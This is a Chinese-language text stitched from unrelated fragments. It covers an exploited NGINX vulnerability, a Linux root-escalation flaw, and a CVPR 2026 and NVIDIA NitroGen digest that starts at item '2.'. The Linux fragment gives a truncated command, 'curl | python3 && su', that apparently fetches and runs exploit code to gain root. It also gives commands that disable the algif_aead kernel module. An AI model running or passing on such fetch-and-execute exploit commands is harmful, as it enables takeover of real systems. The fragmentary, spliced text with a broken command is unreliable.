NGINX 高危漏洞 CVE-2026-42945 已遭黑客利用，该漏洞影响 NGINX Open Source 与 NGINX Plus 0.6.27 至 1.30.0 版本，可导致 worker 进程崩溃，并在关闭 ASLR 防护情况下实现远程代码执行（RCE）。Ledger CTO Charles Guillemet 表示，目前真正运行最新版本 NGINX 的服务器可能不超过 30%，漏洞传播速度正快于 IT 团队修补与升级速度。

看到Xint Code研究团队放出的CVE-2026-31431简直是王炸，换句话说通杀所有Linux发行版，致使低权限账户获得root权限： curl | python3 && su CVE-2026-31431 建议尽快更新系统，事态紧急可以先打个补丁 echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf rmmod algif_aead 2>/dev/null 详细参考👉

2. CVPR 2026 论文提交 (优先级 5) 规模: 16,092 篇投稿，比 2025 年 增长 24%，接收 4,089 篇（约 25%） 热门方向: - 图像/视频合成与生成（最热） - 视觉、语言与推理 - 多模态学习 - 3D 重建 - 医学/生物视觉（增长最快） NVIDIA NitroGen 模型: - 由 NVIDIA + 斯坦福 + 加州理工 + 芝加哥大学 + 德州大学联合发布 - Vision-action 基础模型，专为通用游戏 Agent 设计 - 在 1,000+ 款游戏、40,000 小时游戏视频上训练 - 定位：跨域通用游戏智能体基础模型 其他亮点: - 深圳先进技术研究院 + vivo 的移动端散景渲染 - 弗吉尼亚大学的扩散模型黑盒攻击 - CMU + 剑桥 + 浙大的无训练肿瘤分割框架